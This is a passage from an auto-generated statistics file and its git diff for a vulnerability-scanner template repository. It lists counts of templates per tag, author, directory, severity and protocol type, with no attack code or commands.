"unauthenticated","count":1},{"name":"nsasg","count":1},{"name":"ipdiva","count":1},{"name":"ip2whois","count":1},{"name":"pushgateway","count":1},{"name":"lvm","count":1},{"name":"alerta","count":1},{"name":"sast","count":1},{"name":"messenger","count":1},{"name":"oauth2","count":1},{"name":"atg","count":1},{"name":"drill","count":1},{"name":"optiLink","count":1},{"name":"fastly","count":1},{"name":"rmc","count":1},{"name":"mobile","count":1},{"name":"ueditor","count":1},{"name":"omniampx","count":1},{"name":"superwebmailer","count":1},{"name":"distance","count":1},{"name":"opengear","count":1},{"name":"discord","count":1},{"name":"seopanel","count":1},{"name":"htmli","count":1},{"name":"scrapingdog","count":1},{"name":"tekton","count":1},{"name":"tablereservation","count":1},{"name":"tracking","count":1},{"name":"juniper","count":1},{"name":"phpminiadmin","count":1},{"name":"openx","count":1},{"name":"wifisky","count":1},{"name":"zenario","count":1},{"name":"duomicms","count":1},{"name":"shodan","count":1},{"name":"web3storage","count":1},{"name":"biotime","count":1},{"name":"whm","count":1},{"name":"pubsec","count":1},{"name":"micro","count":1},{"name":"accent","count":1},{"name":"curcy","count":1},{"name":"qts","count":1},{"name":"qdpm","count":1},{"name":"landray","count":1},{"name":"tekon","count":1},{"name":"bazarr","count":1},{"name":"filetransfer","count":1},{"name":"boa","count":1},{"name":"cofense","count":1},{"name":"dasan","count":1},{"name":"asanhamayesh","count":1},{"name":"telecom","count":1},{"name":"system","count":1},{"name":"osquery","count":1},{"name":"webcenter","count":1},{"name":"vagrant","count":1},{"name":"zenrows","count":1},{"name":"ti-woocommerce-wishlist","count":1},{"name":"debounce","count":1},{"name":"netrc","count":1},{"name":"socomec","count":1},{"name":"mariadb","count":1},{"name":"plone","count":1},{"name":"iframe","count":1},{"name":"datahub","count":1},{"name":"shopware","count":1},{"name":"ventrilo","count":1},{"name":"passwordmanager","count":1},{"name":"epm","count":1},{"name":"youtube","count":1},{"name":"cdi","count":1},{"name":"jvm","count":1},{"name":"phpfastcache","count":1},{"name":"lychee","count":1},{"name":"vanguard","count":1},{"name":"utility","count":1},{"name":"mara","count":1},{"name":"employment","count":1},{"name":"tink","count":1},{"name":"szhe","count":1},{"name":"mastodon","count":1},{"name":"lg-nas","count":1},{"name":"exponentcms","count":1},{"name":"cvnd2018","count":1},{"name":"oam","count":1},{"name":"jobsearch","count":1},{"name":"box","count":1},{"name":"sls","count":1},{"name":"clockwork","count":1},{"name":"crm","count":1},{"name":"spectracom","count":1},{"name":"sqwebmail","count":1},{"name":"helpdesk","count":1},{"name":"esmtp","count":1},{"name":"planon","count":1},{"name":"sso","count":1},{"name":"plc","count":1},{"name":"wordpress-country-selector","count":1},{"name":"netweaver","count":1},{"name":"zzzphp","count":1},{"name":"acemanager","count":1},{"name":"powertek","count":1},{"name":"pghero","count":1},{"name":"bagisto","count":1},{"name":"h3c-imc","count":1},{"name":"jaspersoft","count":1},{"name":"gorest","count":1},{"name":"burp","count":1},{"name":"kerio","count":1},{"name":"onelogin","count":1},{"name":"snipeit","count":1},{"name":"rwebserver","count":1},{"name":"elevation","count":1},{"name":"harvardart","count":1},{"name":"nomad","count":1},{"name":"pelco","count":1},{"name":"uservoice","count":1},{"name":"oxid","count":1},{"name":"woody","count":1},{"name":"commvault","count":1},{"name":"tjws","count":1},{"name":"wptouch","count":1},{"name":"amp","count":1},{"name":"mailer","count":1},{"name":"sponip","count":1},{"name":"caa","count":1},{"name":"cofax","count":1},{"name":"geocode","count":1},{"name":"google-earth","count":1},{"name":"ns","count":1},{"name":"myvuehelp","count":1},{"name":"postmark","count":1},{"name":"genie","count":1},{"name":"jobs","count":1},{"name":"gnu","count":1},{"name":"daybyday","count":1},{"name":"file-upload","count":1},{"name":"fortressaircraft","count":1},{"name":"mini_httpd","count":1},{"name":"phpMyChat","count":1},{"name":"rpcms","count":1},{"name":"sco","count":1},{"name":"readme","count":1},{"name":"svnserve","count":1},{"name":"krweb","count":1},{"name":"vercel","count":1},{"name":"bible","count":1},{"name":"nearby","count":1},{"name":"badgeos","count":1},{"name":"lancom","count":1},{"name":"docebo","count":1},{"name":"noptin","count":1},{"name":"fhem","count":1},{"name":"feifeicms","count":1},{"name":"revslider","count":1},{"name":"peoplesoft","count":1},{"name":"thinkserver","count":1},{"name":"synapse","count":1},{"name":"syncthru","count":1},{"name":"goahead","count":1}],"authors":[{"name":"dhiyaneshdk","count":701},{"name":"daffainfo","count":662},{"name":"pikpikcu","count":344},{"name":"pdteam","count":274},{"name":"geeknik","count":206},{"name":"pussycat0x","count":171},{"name":"dwisiswant0","count":171},{"name":"0x_akoko","count":170},{"name":"ritikchaddha","count":163},{"name":"princechaddha","count":153},{"name":"gy741","count":135},{"name":"arafatansari","count":106},{"name":"tess","count":85},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":62},{"name":"akincibor","count":55},{"name":"for3stco1d","count":49},{"name":"gaurang","count":42},{"name":"philippedelteil","count":37},{"name":"edoardottt","count":36},{"name":"c-sh0","count":32},{"name":"adam crosser","count":31},{"name":"theamanrawat","count":31},{"name":"righettod","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"ffffffff0x","count":22},{"name":"techbrunchfr","count":21},{"name":"cckuailong","count":18},{"name":"sullo","count":17},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"random-robbie","count":13},{"name":"tenbird","count":13},{"name":"sharath","count":13},{"name":"johnk3r","count":13},{"name":"0ri2n","count":13},{"name":"melbadry9","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"wdahlenb","count":11},{"name":"elsfa7110","count":11},{"name":"dogasantos","count":11},{"name":"random_robbie","count":10},{"name":"meme-lord","count":10},{"name":"ricardomaia","count":10},{"name":"alph4byt3","count":10},{"name":"hackergautam","count":10},{"name":"nadino","count":10},{"name":"logicalhunter","count":10},{"name":"emadshanab","count":9},{"name":"0x240x23elu","count":9},{"name":"oppsec","count":9},{"name":"zh","count":8},{"name":"veshraj","count":8},{"name":"aashiq","count":8},{"name":"lu4nx","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"caspergn","count":7},{"name":"divya_mudgal","count":7},{"name":"leovalcante","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"amit-jd","count":7},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"iamnoooob","count":6},{"name":"rootxharsh","count":6},{"name":"gitlab red team","count":6},{"name":"evan rubinstein","count":6},{"name":"__fazal","count":6},{"name":"pentest_swissky","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"_0xf4n9x_","count":6},{"name":"forgedhallpass","count":6},{"name":"pathtaga","count":6},{"name":"imnightmaree","count":6},{"name":"nullfuzz","count":6},{"name":"puzzlepeaches","count":6},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"podalirius","count":5},{"name":"nodauf","count":5},{"name":"clem9669","count":5},{"name":"its0x08","count":5},{"name":"ganofins","count":5},{"name":"xelkomy","count":5},{"name":"prajiteshsingh","count":5},{"name":"dadevel","count":4},{"name":"r3naissance","count":4},{"name":"hardik-solanki","count":4},{"name":"h1ei1","count":4},{"name":"tanq16","count":4},{"name":"0xlittleboy","count":4},{"name":"scent2d","count":4},{"name":"incogbyte","count":4},{"name":"dolev farhi","count":4},{"name":"robotshell","count":4},{"name":"powerexploit","count":4},{"name":"shine","count":4},{"name":"defr0ggy","count":4},{"name":"wisnupramoedya","count":4},{"name":"e_schultze_","count":4},{"name":"3th1c_yuk1","count":4},{"name":"lucasljm2001","count":3},{"name":"whoever","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"z3bd","count":3},{"name":"_generic_human_","count":3},{"name":"thomas_from_offensity","count":3},{"name":"alifathi-h1","count":3},{"name":"jarijaas","count":3},{"name":"fxploit","count":3},{"name":"arcc","count":3},{"name":"lark-lab","count":3},{"name":"dr0pd34d","count":3},{"name":"ekrause","count":3},{"name":"andydoering","count":3},{"name":"0w4ys","count":3},{"name":"unstabl3","count":3},{"name":"davidmckennirey","count":3},{"name":"kh4sh3i","count":3},{"name":"ph33r","count":3},{"name":"atomiczsec","count":3},{"name":"sushantkamble","count":3},{"name":"binaryfigments","count":3},{"name":"shifacyclewala","count":3},{"name":"skeltavik","count":3},{"name":"swissky","count":3},{"name":"fyoorer","count":3},{"name":"mavericknerd","count":3},{"name":"ambassify","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"supras","count":3},{"name":"me9187","count":3},{"name":"splint3r7","count":3},{"name":"f1tz","count":3},{"name":"hahwul","count":3},{"name":"emenalf","count":3},{"name":"johnjhacking","count":3},{"name":"dudez","count":3},{"name":"mr-xn","count":3},{"name":"impramodsargar","count":3},{"name":"nvn1729","count":2},{"name":"bing0o","count":2},{"name":"nkxxkn","count":2},{"name":"0xsmiley","count":2},{"name":"r12w4n","count":2},{"name":"0xcrypto","count":2},{"name":"dahse89","count":2},{"name":"joeldeleep","count":2},{"name":"ree4pwn","count":2},{"name":"koti2","count":2},{"name":"bananabr","count":2},{"name":"socketz","count":2},{"name":"smaranchand","count":2},{"name":"zomsop82","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"d4vy","count":2},{"name":"dbrwsky","count":2},{"name":"vsh00t","count":2},{"name":"0xelkomy","count":2},{"name":"hetroublemakr","count":2},{"name":"ajaysenr","count":2},{"name":"danielmofer","count":2},{"name":"amsda","count":2},{"name":"notnotnotveg","count":2},{"name":"y4er","count":2},{"name":"gevakun","count":2},{"name":"z0ne","count":2},{"name":"foulenzer","count":2},{"name":"ehsahil","count":2},{"name":"afaq","count":2},{"name":"666asd","count":2},{"name":"g4l1t0","count":2},{"name":"0xsapra","count":2},{"name":"codexlynx","count":2},{"name":"joshlarsen","count":2},{"name":"udit_thakkur","count":2},{"name":"gal nagli","count":2},{"name":"v0idc0de","count":2},{"name":"thardt-praetorian","count":2},{"name":"badboycxcc","count":2},{"name":"x1m_martijn","count":2},{"name":"redteambrasil","count":2},{"name":"moritz nentwig","count":2},{"name":"cocxanh","count":2},{"name":"clarkvoss","count":2},{"name":"kiblyn11","count":2},{"name":"bsysop","count":2},{"name":"korteke","count":2},{"name":"0xprial","count":2},{"name":"paradessia","count":2},{"name":"paperpen","count":2},{"name":"n-thumann","count":2},{"name":"dheerajmadhukar","count":2},{"name":"raesene","count":2},{"name":"evergreencartoons","count":2},{"name":"hackerarpan","count":2},{"name":"pxmme1337","count":2},{"name":"taielab","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"bernardofsr","count":2},{"name":"thezakman","count":2},{"name":"k11h-de","count":2},{"name":"canberbamber","count":2},{"name":"true13","count":2},{"name":"sy3omda","count":2},{"name":"randomrobbie","count":2},{"name":"parth","count":2},{"name":"huowuzhao","count":2},{"name":"myztique","count":2},{"name":"0xnirvana","count":2},{"name":"uomogrande","count":2},{"name":"geekby","count":2},{"name":"brenocss","count":2},{"name":"rafaelwdornelas","count":2},{"name":"vavkamil","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"martincodes-de","count":2},{"name":"s0obi","count":2},{"name":"nuk3s3c","count":2},{"name":"sbani","count":2},{"name":"0xrudra","count":2},{"name":"manas_harsh","count":2},{"name":"w4cky_","count":2},{"name":"cckuakilong","count":2},{"name":"fabaff","count":2},{"name":"wa1tf0rme","count":2},{"name":"mohammedsaneem","count":2},{"name":"lotusdll","count":2},{"name":"bp0lr","count":2},{"name":"kre80r","count":2},{"name":"8arthur","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"github.com/its0x08","count":2},{"name":"kishore-hariram","count":2},{"name":"convisoappsec","count":2},{"name":"luci","count":2},{"name":"rodnt","count":1},{"name":"remonsec","count":1},{"name":"manuelbua","count":1},{"name":"ahmetpergamum","count":1},{"name":"shivampand3y","count":1},{"name":"elitebaz","count":1},{"name":"xshuden","count":1},{"name":"0xceba","count":1},{"name":"erethon","count":1},{"name":"furkansenan","count":1},{"name":"bartu utku sarp","count":1},{"name":"queencitycyber","count":1},{"name":"lingtren","count":1},{"name":"mantissts","count":1},{"name":"s1r1u5_","count":1},{"name":"coldfish","count":1},{"name":"ooooooo_q","count":1},{"name":"chron0x","count":1},{"name":"pascalheidmann","count":1},{"name":"manasmbellani","count":1},{"name":"screamy","count":1},{"name":"_harleo","count":1},{"name":"droberson","count":1},{"name":"fq_hsu","count":1},{"name":"udyz","count":1},{"name":"becivells","count":1},{"name":"mrcl0wnlab","count":1},{"name":"dale clarke","count":1},{"name":"b0yd","count":1},{"name":"0xrod","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"sickwell","count":1},{"name":"philippdelteil","count":1},{"name":"momen eldawakhly","count":1},{"name":"geraldino2","count":1},{"name":"stupidfish","count":1},{"name":"hexcat","count":1},{"name":"bjhulst","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"infosecsanyam","count":1},{"name":"marcos_iaf","count":1},{"name":"dk999","count":1},{"name":"theabhinavgaur","count":1},{"name":"kiransau","count":1},{"name":"miroslavsotak","count":1},{"name":"miryangjung","count":1},{"name":"sicksec","count":1},{"name":"knassar702","count":1},{"name":"cookiehanhoan","count":1},{"name":"tirtha_mandal","count":1},{"name":"arjunchandarana","count":1},{"name":"hakluke","count":1},{"name":"luskabol","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"ph33rr","count":1},{"name":"dievus","count":1},{"name":"jcockhren","count":1},{"name":"lixts","count":1},{"name":"hanlaomo","count":1},{"name":"jna1","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"ofjaaah","count":1},{"name":"noraj","count":1},{"name":"wabafet","count":1},{"name":"adrianmf","count":1},{"name":"fopina","count":1},{"name":"jeya.seelan","count":1},{"name":"sshell","count":1},{"name":"shockwave","count":1},{"name":"evan rubinstien","count":1},{"name":"harshinsecurity","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"flag007","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sec_hawk","count":1},{"name":"florianmaak","count":1},{"name":"akash.c","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"kaizensecurity","count":1},{"name":"tehtbl","count":1},{"name":"rotemreiss","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"nielsing","count":1},{"name":"y0no","count":1},{"name":"bughuntersurya","count":1},{"name":"pjborah","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"spac3wh1te","count":1},{"name":"rojanrijal","count":1},{"name":"paper-pen","count":1},{"name":"1nf1n7y","count":1},{"name":"shelld3v","count":1},{"name":"ling","count":1},{"name":"opencirt","count":1},{"name":"p-l-","count":1},{"name":"retr0","count":1},{"name":"micha3lb3n","count":1},{"name":"imhunterand","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"pdp","count":1},{"name":"couskito","count":1},{"name":"exceed","count":1},{"name":"narluin","count":1},{"name":"compr00t","count":1},{"name":"b0rn2r00t","count":1},{"name":"schniggie","count":1},{"name":"yashgoti","count":1},{"name":"b4uh0lz","count":1},{"name":"elder tao","count":1},{"name":"charanrayudu","count":1},{"name":"tea","count":1},{"name":"sak1","count":1},{"name":"ramkrishna sawant","count":1},{"name":"francescocarlucci","count":1},{"name":"kabirsuda","count":1},{"name":"ilovebinbash","count":1},{"name":"akshansh","count":1},{"name":"igibanez","count":1},{"name":"duty_1g","count":1},{"name":"secthebit","count":1},{"name":"soyelmago","count":1},{"name":"_c0wb0y_","count":1},{"name":"wlayzz","count":1},{"name":"whynotke","count":1},{"name":"anon-artist","count":1},{"name":"httpvoid","count":1},{"name":"unkl4b","count":1},{"name":"ldionmarcil","count":1},{"name":"0xtavian","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"mhdsamx","count":1},{"name":"phyr3wall","count":1},{"name":"aaronchen0","count":1},{"name":"rschio","count":1},{"name":"aringo","count":1},{"name":"co0nan","count":1},{"name":"x6263","count":1},{"name":"yavolo","count":1},{"name":"furkansayim","count":1},{"name":"iphantasmic","count":1},{"name":"absshax","count":1},{"name":"noamrathaus","count":1},{"name":"natto97","count":1},{"name":"lethargynavigator","count":1},{"name":"j33n1k4","count":1},{"name":"shreyapohekar","count":1},{"name":"0xceeb","count":1},{"name":"jaimin gondaliya","count":1},{"name":"exid","count":1},{"name":"zandros0","count":1},{"name":"alex","count":1},{"name":"petruknisme","count":1},{"name":"jbaines-r7","count":1},{"name":"noobexploiter","count":1},{"name":"alevsk","count":1},{"name":"liquidsec","count":1},{"name":"open-sec","count":1},{"name":"majidmc2","count":1},{"name":"iampritam","count":1},{"name":"ahmed abou-ela","count":1},{"name":"ohlinge","count":1},{"name":"xstp","count":1},{"name":"streetofhackerr007","count":1},{"name":"caon","count":1},{"name":"patralos","count":1},{"name":"kurohost","count":1},{"name":"calumjelrick","count":1},{"name":"8authur","count":1},{"name":"un-fmunozs","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"berkdusunur","count":1},{"name":"bad5ect0r","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"gboddin","count":1},{"name":"xeldax","count":1},{"name":"andirrahmani1","count":1},{"name":"0xteles","count":1},{"name":"izn0u","count":1},{"name":"thelicato","count":1},{"name":"nobody","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"ringo","count":1},{"name":"rubina119","count":1},{"name":"ola456","count":1},{"name":"nerrorsec","count":1},{"name":"official_blackhat13","count":1},{"name":"arall","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"jbertman","count":1},{"name":"udinchan","count":1},{"name":"jaskaran","count":1},{"name":"lark lab","count":1},{"name":"af001","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"_darrenmartyn","count":1},{"name":"blckraven","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"lrtk-coder","count":1},{"name":"omarkurt","count":1},{"name":"megamansec","count":1},{"name":"sinkettu","count":1},{"name":"dawid-czarnecki","count":1},{"name":"kr1shna4garwal","count":1},{"name":"lamscun","count":1},{"name":"justmumu","count":1},{"name":"hardik-rathod","count":1},{"name":"elmahdi","count":1},{"name":"f1she3","count":1},{"name":"piyushchhiroliya","count":1},{"name":"skylark-lab","count":1},{"name":"danigoland","count":1},{"name":"affix","count":1},{"name":"rivalsec","count":1},{"name":"thevillagehacker","count":1},{"name":"ahmed sherif","count":1},{"name":"thebinitghimire","count":1},{"name":"tim_koopmans","count":1},{"name":"alperenkesk","count":1},{"name":"alexrydzak","count":1},{"name":"jiheon-dev","count":1},{"name":"rotembar","count":1},{"name":"nagli","count":1},{"name":"arm!tage","count":1},{"name":"nytr0gen","count":1},{"name":"0xh7ml","count":1},{"name":"mass0ma","count":1},{"name":"0ut0fb4nd","count":1},{"name":"0h1in9e","count":1},{"name":"aresx","count":1},{"name":"evolutionsec","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"notsoevilweasel","count":1},{"name":"retr02332","count":1},{"name":"viondexd","count":1},{"name":"luqmaan hadia","count":1},{"name":"pudsec","count":1},{"name":"c3l3si4n","count":1},{"name":"brabbit10","count":1},{"name":"5up3r541y4n","count":1},{"name":"jteles","count":1},{"name":"mubassirpatel","count":1},{"name":"kareemse1im","count":1},{"name":"regala_","count":1},{"name":"exploitation","count":1},{"name":"jeya seelan","count":1},{"name":"d0rkerdevil","count":1},{"name":"kailashbohara","count":1},{"name":"push4d","count":1},{"name":"sherlocksecurity","count":1},{"name":"prettyboyaaditya","count":1},{"name":"act1on3","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"osamahamad","count":1},{"name":"ggranjus","count":1},{"name":"apt-mirror","count":1},{"name":"shifacyclewla","count":1},{"name":"ipanda","count":1},{"name":"djoevanka","count":1},{"name":"mah3sec_","count":1},{"name":"th3.d1p4k","count":1},{"name":"orpheus","count":1},{"name":"juicypotato1","count":1},{"name":"breno_css","count":1},{"name":"borna nematzadeh","count":1},{"name":"daviey","count":1},{"name":"ptonewreckin","count":1},{"name":"vinit989","count":1},{"name":"willd96","count":1},{"name":"arr0way","count":1},{"name":"viniciuspereiras","count":1},{"name":"luqman","count":1},{"name":"oscarintherocks","count":1},{"name":"ok_bye_now","count":1},{"name":"carlosvieira","count":1},{"name":"failopen","count":1},{"name":"bywalks","count":1},{"name":"pratik khalane","count":1},{"name":"kiks7","count":1},{"name":"w0tx","count":1},{"name":"zhenwarx","count":1},{"name":"undefl0w","count":1},{"name":"elouhi","count":1},{"name":"dhiyaneshdki","count":1},{"name":"husain","count":1},{"name":"tirtha","count":1},{"name":"yashanand155","count":1},{"name":"vzamanillo","count":1},{"name":"davidfegyver","count":1},{"name":"pry0cc","count":1},{"name":"allenwest24","count":1},{"name":"revblock","count":1},{"name":"realexp3rt","count":1},{"name":"ransomsec","count":1},{"name":"zsusac","count":1},{"name":"shiar","count":1},{"name":"jas37","count":1},{"name":"yuansec","count":1},{"name":"intx0x80","count":1},{"name":"hakimkt","count":1},{"name":"zinminphy0","count":1},{"name":"fmunozs","count":1},{"name":"maximus decimus","count":1},{"name":"qlkwej","count":1},{"name":"mesaglio","count":1},{"name":"andysvints","count":1},{"name":"0xd0ff9","count":1},{"name":"h4kux","count":1},{"name":"makyotox","count":1},{"name":"amanrawat","count":1},{"name":"2rs3c","count":1},{"name":"jrolf","count":1},{"name":"aayush vishnoi","count":1},{"name":"deena","count":1},{"name":"toufik-airane","count":1},{"name":"clment cruchet","count":1},{"name":"amnotacat","count":1},{"name":"daffianfo","count":1}],"directory":[{"name":"cves","count":1528},{"name":"exposed-panels","count":780},{"name":"vulnerabilities","count":519},{"name":"misconfiguration","count":361},{"name":"technologies","count":319},{"name":"exposures","count":308},{"name":"token-spray","count":236},{"name":"workflows","count":190},{"name":"default-logins","count":116},{"name":"file","count":78},{"name":"takeovers","count":69},{"name":"network","count":63},{"name":"iot","count":41},{"name":"miscellaneous","count":25},{"name":"cnvd","count":25},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"ssl","count":8},{"name":"headless","count":7}],"severity":[{"name":"info","count":1666},{"name":"high","count":1152},{"name":"medium","count":835},{"name":"critical","count":552},{"name":"low","count":281},{"name":"unknown","count":25}],"types":[{"name":"http","count":4323},{"name":"file","count":78},{"name":"network","count":77},{"name":"dns","count":17}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index a69ef4baec..16c331f8f6 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,2222 +1,2262 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------------------|-------|-------------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1538 | dhiyaneshdk | 692 | cves | 1516 | info | 1631 | http | 4257 | -| panel | 755 | daffainfo | 662 | exposed-panels | 757 | high | 1141 | file | 78 | -| edb | 578 | pikpikcu | 340 | vulnerabilities | 518 | medium | 829 | network | 73 | -| xss | 537 | pdteam | 274 | misconfiguration | 350 | critical | 546 | dns | 17 | -| exposure | 536 | geeknik | 197 | technologies | 311 | low | 269 | | | -| lfi | 519 | dwisiswant0 | 171 | exposures | 301 | unknown | 25 | | | -| wordpress | 465 | 0x_akoko | 170 | token-spray | 235 | | | | | -| cve2021 | 366 | pussycat0x | 168 | workflows | 190 | | | | | -| wp-plugin | 360 | ritikchaddha | 161 | default-logins | 114 | | | | | -| tech | 349 | princechaddha | 153 | file | 78 | | | | | -| rce | 345 | gy741 | 135 | takeovers | 68 | | | | | -| packetstorm | 291 | arafatansari | 102 | network | 59 | | | | | -| cve2022 | 262 | tess | 82 | iot | 41 | | | | | -| wpscan | 252 | madrobot | 65 | cnvd | 25 | | | | | -| token-spray | 235 | zzeitlin | 64 | miscellaneous | 25 | | | | | -| misconfig | 221 | idealphase | 61 | dns | 17 | | | | | -| cve2020 | 221 | akincibor | 51 | fuzzing | 12 | | | | | -| | 195 | for3stco1d | 48 | ssl | 8 | | | | | +| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 | +| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 | +| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 | +| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 | +| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | | +| lfi | 519 | pussycat0x | 171 | exposures | 308 | unknown | 25 | | | +| wordpress | 470 | dwisiswant0 | 171 | token-spray | 236 | | | | | +| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | | +| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | | +| tech | 357 | princechaddha | 153 | file | 78 | | | | | +| rce | 347 | gy741 | 135 | takeovers | 69 | | | | | +| packetstorm | 292 | arafatansari | 106 | network | 63 | | | | | +| cve2022 | 269 | tess | 85 | iot | 41 | | | | | +| wpscan | 256 | madrobot | 65 | miscellaneous | 25 | | | | | +| token-spray | 236 | zzeitlin | 64 | cnvd | 25 | | | | | +| misconfig | 228 | idealphase | 62 | dns | 17 | | | | | +| cve2020 | 222 | akincibor | 55 | fuzzing | 12 | | | | | +| | 195 | for3stco1d | 49 | ssl | 8 | | | | | | unauth | 194 | gaurang | 42 | headless | 7 | | | | | -| wp | 182 | philippedelteil | 36 | | | | | | | -| kev | 167 | edoardottt | 34 | | | | | | | -| config | 163 | theamanrawat | 31 | | | | | | | -| cve2018 | 145 | adam crosser | 31 | | | | | | | -| cve2019 | 137 | ice3man | 26 | | | | | | | -| joomla | 135 | c-sh0 | 26 | | | | | | | -| default-login | 130 | organiccrap | 24 | | | | | | | -| oast | 127 | righettod | 23 | | | | | | | -| apache | 126 | ffffffff0x | 22 | | | | | | | -| iot | 123 | techbrunchfr | 21 | | | | | | | -| authenticated | 118 | cckuailong | 18 | | | | | | | -| sqli | 115 | sullo | 17 | | | | | | | +| wp | 187 | philippedelteil | 37 | | | | | | | +| kev | 168 | edoardottt | 36 | | | | | | | +| config | 167 | c-sh0 | 32 | | | | | | | +| cve2018 | 145 | theamanrawat | 31 | | | | | | | +| cve2019 | 137 | adam crosser | 31 | | | | | | | +| joomla | 135 | righettod | 29 | | | | | | | +| default-login | 133 | ice3man | 26 | | | | | | | +| apache | 127 | organiccrap | 24 | | | | | | | +| oast | 127 | ffffffff0x | 22 | | | | | | | +| iot | 125 | techbrunchfr | 21 | | | | | | | +| authenticated | 120 | cckuailong | 18 | | | | | | | +| sqli | 118 | sullo | 17 | | | | | | | | cve2010 | 111 | pr3r00t | 15 | | | | | | | -| router | 90 | sheikhrishad | 15 | | | | | | | +| files | 92 | sheikhrishad | 15 | | | | | | | +| router | 92 | r3dg33k | 14 | | | | | | | | redirect | 90 | milo2012 | 14 | | | | | | | -| files | 89 | r3dg33k | 14 | | | | | | | -| login | 88 | tenbird | 13 | | | | | | | -| network | 76 | johnk3r | 13 | | | | | | | +| login | 89 | 0ri2n | 13 | | | | | | | +| network | 81 | random-robbie | 13 | | | | | | | | devops | 75 | sharath | 13 | | | | | | | -| takeover | 74 | random-robbie | 13 | | | | | | | -| token | 74 | 0ri2n | 13 | | | | | | | -| ssrf | 72 | melbadry9 | 12 | | | | | | | -| cve2017 | 70 | suman_kar | 12 | | | | | | | -| cms | 67 | dogasantos | 11 | | | | | | | +| takeover | 75 | tenbird | 13 | | | | | | | +| token | 74 | johnk3r | 13 | | | | | | | +| ssrf | 72 | suman_kar | 12 | | | | | | | +| cve2017 | 70 | melbadry9 | 12 | | | | | | | +| cms | 67 | wdahlenb | 11 | | | | | | | +| auth-bypass | 66 | cyllective | 11 | | | | | | | | file | 65 | elsfa7110 | 11 | | | | | | | -| auth-bypass | 65 | wdahlenb | 11 | | | | | | | -| oracle | 62 | cyllective | 11 | | | | | | | -| intrusive | 59 | logicalhunter | 10 | | | | | | | -| install | 58 | alph4byt3 | 10 | | | | | | | -| seclists | 57 | nadino | 10 | | | | | | | -| disclosure | 56 | random_robbie | 10 | | | | | | | -| oss | 51 | meme-lord | 10 | | | | | | | -| cve2016 | 49 | hackergautam | 10 | | | | | | | -| cisco | 49 | oppsec | 9 | | | | | | | -| google | 48 | 0x240x23elu | 9 | | | | | | | +| oracle | 63 | dogasantos | 11 | | | | | | | +| intrusive | 60 | ricardomaia | 10 | | | | | | | +| install | 59 | alph4byt3 | 10 | | | | | | | +| seclists | 57 | hackergautam | 10 | | | | | | | +| disclosure | 57 | random_robbie | 10 | | | | | | | +| oss | 52 | meme-lord | 10 | | | | | | | +| cisco | 50 | logicalhunter | 10 | | | | | | | +| cve2016 | 49 | nadino | 10 | | | | | | | +| google | 48 | oppsec | 9 | | | | | | | | fileupload | 47 | emadshanab | 9 | | | | | | | -| cve2015 | 47 | lu4nx | 8 | | | | | | | +| cve2015 | 47 | 0x240x23elu | 9 | | | | | | | | adobe | 45 | iamthefrogy | 8 | | | | | | | | aem | 42 | veshraj | 8 | | | | | | | -| cve2014 | 41 | that_juan_ | 8 | | | | | | | -| plugin | 41 | aashiq | 8 | | | | | | | -| atlassian | 38 | zh | 8 | | | | | | | +| plugin | 41 | that_juan_ | 8 | | | | | | | +| cve2014 | 41 | lu4nx | 8 | | | | | | | +| atlassian | 38 | aashiq | 8 | | | | | | | +| vulhub | 38 | zh | 8 | | | | | | | +| logs | 38 | divya_mudgal | 7 | | | | | | | | vmware | 38 | kophjager007 | 7 | | | | | | | -| vulhub | 38 | divya_mudgal | 7 | | | | | | | -| logs | 37 | dr_set | 